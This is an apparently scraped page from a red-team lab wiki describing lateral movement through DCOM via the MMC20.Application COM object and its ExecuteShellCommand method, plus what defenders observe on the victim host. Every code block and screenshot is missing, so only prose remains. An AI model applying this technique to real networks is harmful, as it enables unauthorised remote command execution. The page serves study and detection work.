Ctrlk
For the complete documentation index, see llms.txt. This page is also available as Markdown.
ChatGPT

Lateral Movement via DCOM

Lateral Movement via Distributed Component Object Model

The Microsoft Component Object Model (COM) is a platform-independent, distributed, object-oriented system for creating binary software components that can interact. COM is the foundation technology for Microsoft's OLE (compound documents), ActiveX (Internet-enabled components), as well as others.

https://docs.microsoft.com/en-us/windows/desktop/com/the-component-object-model

This lab explores a DCOM lateral movement technique using MMC20.Application COM as originally researched by @enigma0x3 in his blog post Lateral Movement using the mmc20.application Com Object

Execution

MMC20.Application COM class is stored in the registry as shown below:

Same can be achieved with powershell:

Establishing a connection to the victim host:

Executing command on the victim system via DCOM object:

Below shows the command execution and the result of it - remote machine's hostname command output is written to c:\fromdcom.txt:

Observations

Once the connection from an attacker to victim is established using the below powershell:

This is what happens on the victim system - svchost spawns mmc.exe which opens a listening port via RPC binding:

A network connection is logged from 10.0.0.7 (attacker) to 10.0.0.2 (victim) via offense\administrator (can be also seen from the above screenshot):

References

LogoLateral Movement using the MMC20.Application COM Objectenigma0x3
LogoView ExecuteShellCommand methodMicrosoftLearn
LogoType.GetTypeFromCLSID Method (System)MicrosoftLearn
LogoCOM Technical Overview - Win32 appsMicrosoftLearn
https://attack.mitre.org/wiki/Technique/T1175attack.mitre.org
PreviousShared WebrootNextWMI + MSI Lateral Movement

Last updated